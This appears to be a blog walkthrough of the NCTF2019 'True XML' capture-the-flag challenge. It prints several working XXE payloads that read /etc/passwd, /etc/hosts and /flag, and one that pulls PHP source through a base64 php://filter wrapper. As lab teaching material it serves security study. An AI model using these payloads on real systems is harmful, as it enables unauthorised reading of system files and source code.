###
NCTF2019 True
XML Challenge Solutions and Walkthrough
In the context of the
NCTF2019 competition, several challenges involved exploiting XXE (
XML External Entity) vulnerabilities within
XML documents to achieve various objectives such as file reading or server-side request forgery.
#### Exploiting Basic XXE Vulnerability
An example payload that demonstrates a basic XXE attack is shown below:
```
xml
<?
xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///etc/hosts">
]>
<user>
<username>&admin;</username>
<password>1</password>
</user>
```
This payload attempts to read the contents of `/etc/hosts` by defining an external entity `admin`, which references this system file[^2].
#### Advanced File Reading with Different Protocols
When direct access using the `file://` protocol does not work due to restrictions imposed by some parsers, alternative protocols can be used. For instance, PHP's filter wrapper allows for more sophisticated attacks where files are encoded before being sent back to the attacker:
```
xml
<?
xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ENTITY xee SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.php">
]>
<user>
<username>&xee;</username>
<password>123123</password>
</user>
```
Here, instead of directly accessing the target file via its path, the content of `doLogin.php` gets base64-encoded through PHP’s filtering mechanism prior to transmission[^4].
#### Targeting Specific Files on Server
For scenarios requiring specific sensitive information like flags stored somewhere accessible only internally, crafting payloads targeting these locations becomes crucial:
```
xml
<?
xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]>
<user>
<username>&admin;</username>
<password>123456</password>
</user>
```
The above code snippet aims at retrieving flag data located under root directory named 'flag'[^3].
#### General Approach Against Black Box Systems
Even without detailed knowledge about internal structures, one could still attempt common paths known across many systems:
```
xml
<?
xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<user><username> &xxe; </username><password> 1 </password></user>
```
By referencing well-known Unix/Linux configuration files (`/etc/passwd`) in the entity definition, attackers may gain insights into underlying OS configurations even when no explicit details were provided initially[^5].
--related questions--
1. How do different web application frameworks handle
XML parsing differently?
2. What measures should developers take to prevent XXE attacks effectively?
3. Can you provide examples of real-world incidents caused by XXE vulnerabilities?
4. Are there any tools specifically designed for detecting XXE flaws during security audits?
5. In what ways has modern software development mitigated risks associated with XXE issues over time?
本文介绍了一种利用XML外部实体(XXE)漏洞的方法来尝试绕过登录验证的过程。通过构造特殊的payload,尝试读取服务器上的敏感文件。
扫一扫
2118
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
